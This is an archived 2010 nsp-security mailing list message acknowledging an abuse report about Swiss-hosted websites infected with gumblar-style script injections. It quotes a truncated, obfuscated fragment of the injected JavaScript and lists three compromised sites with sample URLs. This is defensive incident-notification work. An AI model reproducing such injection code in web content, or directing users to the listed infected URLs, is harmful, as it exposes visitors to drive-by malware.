[nsp-sec] ACK 29222 gumblar-style infections
Jan Boogman
boogman at ip-plus.net
Wed May 12 14:28:19 EDT 2010
Proxy-Ack for AS29222
Jan
Swisscom IP-Plus Eng.
> ----------- nsp-security Confidential --------
>
> Hi,
>
> please find attached a list of web sites with javascripts/iframes redirecting
> to gumblar-style exploit hosts.
>
> An example injection looks like this:
> <script>this.v='';this.C=51578;this.C-=144;function W(){var
> j="j";k={};var M=document;try [.. truncated ..]</script><!--8c831cfc3501fade343bbf9c5d556620-->
>
> The format is:
> <ASN> | <IP> | <CC> | <hits> | <domain> | <sample URL> | <first seen> |<last seen> | <AS desc>
>
> kind regards, Dirk :.
>
> -----------------------------------------------------------------------------------------------
>
>
> 29222 | 84.16.81.52 | CH | 2 | transitmag.ch | http://transitmag.ch/ | Tue May 4 20:07:16 2010 | Tue May 4 20:07:28 2010 | INFOMANIAK-AS Infomaniak Network SA
> 29222 | 84.16.82.19 | CH | 1 | archipo.com | http://www.archipo.com/d616/ | Mon May 10 17:49:50 2010 | Mon May 10 17:49:50 2010 | INFOMANIAK-AS Infomaniak Network SA
> 29222 | 84.16.92.232 | CH | 13 | catsfoundation.org | http://www.catsfoundation.org/audit.php | Tue May 11 20:42:49 2010 | Tue May 11 20:44:33 2010 | INFOMANIAK-AS Infomaniak Network SA
>
More information about the nsp-security
mailing list